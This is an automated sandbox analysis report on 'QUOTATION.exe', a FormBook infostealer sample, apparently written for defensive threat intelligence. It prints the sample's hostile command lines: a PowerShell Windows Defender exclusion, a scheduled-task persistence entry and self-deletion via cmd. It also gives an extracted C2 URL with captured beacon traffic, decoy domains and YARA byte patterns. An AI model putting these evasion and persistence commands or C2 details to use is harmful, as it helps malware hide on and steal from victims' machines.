Loading ...

Play interactive tourEdit tour

Windows Analysis Report QUOTATION.exe

Overview

General Information

Sample Name:QUOTATION.exe
Analysis ID:532906
MD5:213d8fd4b74e3b1122cfc1a9159aa579
SHA1:3fcea21ca260c922f371877bef1cec0b2293f1e9
SHA256:696ba286fa1d2d46b09dee92733f9ca34bfe3e58f50a440a3ec89f63bba76441
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • QUOTATION.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\QUOTATION.exe" MD5: 213D8FD4B74E3B1122CFC1A9159AA579)
    • powershell.exe (PID: 7120 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5516 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • QUOTATION.exe (PID: 6728 cmdline: C:\Users\user\Desktop\QUOTATION.exe MD5: 213D8FD4B74E3B1122CFC1A9159AA579)
    • QUOTATION.exe (PID: 5372 cmdline: C:\Users\user\Desktop\QUOTATION.exe MD5: 213D8FD4B74E3B1122CFC1A9159AA579)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 3180 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
      • NETSTAT.EXE (PID: 5100 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
        • cmd.exe (PID: 6896 cmdline: /c del "C:\Users\user\Desktop\QUOTATION.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.purelai.store/p2r0/"], "decoy": ["armory-village.net", "gailgylee.store", "hyjqjd.com", "dgastudios.com", "freedomofspain.com", "coneofpositivity.com", "wesleyb.com", "cacciatorediteglie.com", "refatu.com", "apexfreightdispatch.com", "fichesdematerialisees.com", "hoopmetaverse.com", "gesogog.com", "mosaicelevatormonitoring.com", "mrstarrtutorsmath.com", "kebalunion.com", "xn--15qv36df6am25bt2p.top", "archedbeautynw.com", "glczklft.com", "zhejiang-huayang.com", "mariogriffinphoto.com", "metomecetefur.rest", "sabimode.com", "pityporg.online", "plumbinghelp411.com", "neontvplay.com", "hellofurb.com", "jamerah.com", "alarshllc.com", "secure2work.cloud", "wanderlustwallart.com", "altinayrent.com", "odishaparagliding.com", "jijijfiaf.xyz", "zaracentres.com", "shorthillsnjhomespecialists.com", "everdayevolution.net", "kpopyostore.com", "bitsandbuds.com", "dalstudio.net", "anh-law.com", "ecogreenhanukkah.com", "ittibrief.com", "itargetcampaigns.com", "abczqzhkmu.com", "dentistslexington.com", "searchinmetaverse.com", "mypharmatea.com", "omdeforoush.com", "bbtenzymes.com", "thefactologist.com", "mki-sb.com", "escrowtimeonline.com", "global-therm.com", "yourlifedesignjourney.com", "318donate.com", "montessori-academies.com", "virgotalk.com", "alvincjohnson.com", "hxcopymrerem.biz", "gslean.com", "darknessnft.com", "hummelconstrllc.com", "metaversefed.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      17.0.QUOTATION.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        17.0.QUOTATION.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        17.0.QUOTATION.exe.400000.6.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        17.0.QUOTATION.exe.400000.6.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          17.0.QUOTATION.exe.400000.6.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 17 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspicius Add Task From User AppData TempShow sources
          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION.exe" , ParentImage: C:\Users\user\Desktop\QUOTATION.exe, ParentProcessId: 6924, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp, ProcessId: 5516
          Sigma detected: Powershell Defender ExclusionShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION.exe" , ParentImage: C:\Users\user\Desktop\QUOTATION.exe, ParentProcessId: 6924, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe, ProcessId: 7120
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION.exe" , ParentImage: C:\Users\user\Desktop\QUOTATION.exe, ParentProcessId: 6924, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe, ProcessId: 7120
          Sigma detected: T1086 PowerShell ExecutionShow sources
          Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132829772743618324.7120.DefaultAppDomain.powershell

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.purelai.store/p2r0/"], "decoy": ["armory-village.net", "gailgylee.store", "hyjqjd.com", "dgastudios.com", "freedomofspain.com", "coneofpositivity.com", "wesleyb.com", "cacciatorediteglie.com", "refatu.com", "apexfreightdispatch.com", "fichesdematerialisees.com", "hoopmetaverse.com", "gesogog.com", "mosaicelevatormonitoring.com", "mrstarrtutorsmath.com", "kebalunion.com", "xn--15qv36df6am25bt2p.top", "archedbeautynw.com", "glczklft.com", "zhejiang-huayang.com", "mariogriffinphoto.com", "metomecetefur.rest", "sabimode.com", "pityporg.online", "plumbinghelp411.com", "neontvplay.com", "hellofurb.com", "jamerah.com", "alarshllc.com", "secure2work.cloud", "wanderlustwallart.com", "altinayrent.com", "odishaparagliding.com", "jijijfiaf.xyz", "zaracentres.com", "shorthillsnjhomespecialists.com", "everdayevolution.net", "kpopyostore.com", "bitsandbuds.com", "dalstudio.net", "anh-law.com", "ecogreenhanukkah.com", "ittibrief.com", "itargetcampaigns.com", "abczqzhkmu.com", "dentistslexington.com", "searchinmetaverse.com", "mypharmatea.com", "omdeforoush.com", "bbtenzymes.com", "thefactologist.com", "mki-sb.com", "escrowtimeonline.com", "global-therm.com", "yourlifedesignjourney.com", "318donate.com", "montessori-academies.com", "virgotalk.com", "alvincjohnson.com", "hxcopymrerem.biz", "gslean.com", "darknessnft.com", "hummelconstrllc.com", "metaversefed.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: QUOTATION.exeVirustotal: Detection: 40%Perma Link
          Source: QUOTATION.exeReversingLabs: Detection: 18%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://www.purelai.store/p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnXAvira URL Cloud: Label: malware
          Source: www.purelai.store/p2r0/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exeReversingLabs: Detection: 18%
          Source: 17.0.QUOTATION.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.0.QUOTATION.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.2.QUOTATION.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.0.QUOTATION.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: QUOTATION.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: QUOTATION.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
          Source: Binary string: netstat.pdb source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTATION.exe, QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.purelai.store
          Source: C:\Windows\explorer.exeNetwork Connect: 208.51.62.42 80
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.purelai.store/p2r0/
          Source: global trafficHTTP traffic detected: GET /p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX HTTP/1.1Host: www.purelai.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: NETSTAT.EXE, 00000018.00000002.549103186.0000000003C3F000.00000004.00020000.sdmpString found in binary or memory: https://wildcard.hostgator.com/p2r0/?U2JXS=zl7ruCTqPiUCF1L
          Source: unknownDNS traffic detected: queries for: www.purelai.store
          Source: global trafficHTTP traffic detected: GET /p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX HTTP/1.1Host: www.purelai.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
